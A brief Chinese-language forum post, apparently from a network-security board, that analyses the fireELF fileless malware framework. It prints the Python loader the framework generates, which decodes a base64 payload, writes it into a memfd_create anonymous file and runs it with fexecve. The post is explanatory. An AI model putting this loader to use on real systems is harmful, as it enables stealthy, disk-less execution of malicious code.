2019-M02 - Fileless Malware Framework 看文章的时候看到了一个 [project][0] 介绍 fileless 的恶意程式：他是用 python 写的 linux-based 的无档案恶意程式套件 可以让使用者简单快速的产生、建立一个 fileless 恶意程式 不得不说，这个 project 的 source code 可读性非常差 (虽然用 Python 撰写的) 在 main.py 开始有两个部分：CLI 参数的处理、以及产生恶意程式的部分 在透过一连串的操作之後最後会产生一个 Python 恶意档案： #! /usr/bin/env python import ctypes, os, urllib2, base64 libc = ctypes.CDLL(None) argv = ctypes.pointer((ctypes.c_char_p * 0)(*[])) syscall = libc.syscall fexecve = libc.fexecve content = base64.b64decode("...") fd = syscall(319, "", 1) os.write(fd, content) fexecve(fd, argv, argv) 从产生的程式码来看他的目的是透过：ctypes 来找到 [fexecve][1] 跟 [sys_memfd_create][2] 这两个 syscall 来完成无档案的恶意程式 先透过 **memfd_create** 来产生一个昵名档案 (anonymous file)、写入恶意内容、最後透过 **fexecve** 执行。 [0]: https://github.com/rek7/fireELF/ [1]: https://linux.die.net/man/3/fexecve [2]: https://www.systutorials.com/docs/linux/man/2-memfd_create/ --

※ 发信站: 批踢踢实业坊(ptt.cc), 来自: 106.1.224.240 ※ 文章网址: https://webptt.com/cn.aspx?n=bbs/NetSecurity/M.1555739664.A.090.html